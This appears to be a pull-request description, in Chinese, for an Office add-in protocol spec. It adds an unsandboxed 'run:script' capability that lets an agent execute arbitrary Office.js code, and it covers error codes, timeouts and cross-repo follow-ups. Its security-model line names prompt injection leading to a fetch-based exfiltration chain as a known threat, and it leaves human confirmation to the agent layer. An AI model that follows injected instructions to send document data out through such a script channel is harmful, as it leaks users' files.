| `data-structures.md` | 新增 `RunScriptRequest`（`script`/`args?`/`timeoutMs?`）+ `ScriptResult`（`result`/`logs`/`durationMs`/`logsTruncated`）——**宿主无关执行信封**，三命名空间共享，含「有意跨命名空间相同」admonition（与 `WordFont`≠`PptFont` 反向对照） |
| `conventions.md` | 新增 §脚本执行：执行语义（`AsyncFunction`/注入 `context`·`args`·`console`/补 `sync`/JSON 序列化）+ 大小限制（`result` ≤ 512KB、`logs` ≤ 100KB，**UTF-8 字节**）+ 超时（缺省 60s、**无硬 max**、`timeoutMs` 覆盖、超时非抢占）+ 安全模型 + 两层非原子性 + 4-D 错误映射；超时约定新增「脚本执行」档 |
| `error-handling.md` | `3004` 详解段补 `run:script` 的 `fault:script\|office` 二级分流回指（→ conventions#run-script-errors） |
| `events-{excel,word,ppt}.md` | 事件列表新增「脚本执行类」+ `{ns}:run:script` 事件（接口/参数/示例/错误表）；PPT 补 `isSetSupported` 自检提示；Word 标「新增事件·纯加法」 |
| `changelog.md` | `[Unreleased]` 增补 |

## 关键设计裁决

- **动作词 `run`**（对齐 Office.js `Excel.run`/`Word.run`）。
- **错误码 4-D，零新增**：缺参→`4001`/`4003`/`4004`；语法错→`4002`+`phase:compile`；宿主禁动态代码（CSP）→`3016`+`phase:compile`；脚本 throw→`3004`+`fault:"script"`；Office.js 失败→`3004`+`fault:"office"`+`officeCode`；超时→`1002`；`result` 过大→`3006`。
- **不引入 `dryRun`**（正常 run 已在 compile 期安全返回语法错，不触文档）。
- **确认门移出 OASP**：人在环「执行前确认」由上层 Agent 层的通用工具二次确认承担，OASP/Add-In 为**纯能力提供方**、不自建确认门、不提供安全边界。故原候选 `3019 USER_REJECTED` 与确认门握手能力位**均取消**。
- **安全模型 + 非原子性写入规范正文**：非沙箱（沙箱与「直接调原生 Office.js」定义上互斥）、信任边界=握手鉴权、提示词注入→`fetch` 外泄链（typed 事件不可达）；失败时文档可能残留部分修改（跨 sync + 单 sync 内部半批，Office.js 无事务/回滚 API）。

## 消费方 cross-ask（Step 3.5，P0 清零）

- **office4ai**：纯中转成立，六项无阻塞；MCP 工具每命名空间一个（`{ns}_run_script`，ESCAPE HATCH 定位、与既有离线 `office_run_script` 互指）；`details` 原样透传不裁剪；承诺 `{ns}:run:script` 派生 `server_timeout=(timeoutMs??60s)+GRACE`。
- **office-editor4ai**：Word/PPT 同构移植可行；4-D 可实现（`fault` 用 `instanceof OfficeExtension.Error` 判、compile 期 `EvalError`→3016 / `SyntaxError`→4002）；补 `sync` + 两层非原子确认；`client.ts` 双重 ack 认领修复。**唯一 P0（资源型）**：Windows/WebView2 + Office-on-web 探针零实测——失败模式已 spec（→`3016`+`phase:compile`），裁定为 **office-editor4ai 发版前门控**，不阻协议合并。

## 跨仓跟进（开发 issue 另起）

- office4ai：DTO + 每命名空间 MCP 工具 + `server_timeout` 派生。
- office-editor4ai：三端 `AsyncFunction` 执行器（宿主无关核心进 `shared`）+ `client.ts` 双重 ack 修复 + **发版前**补测两宿主探针。

🤖 Generated with [Claude Code](https://claude.com/claude-code)
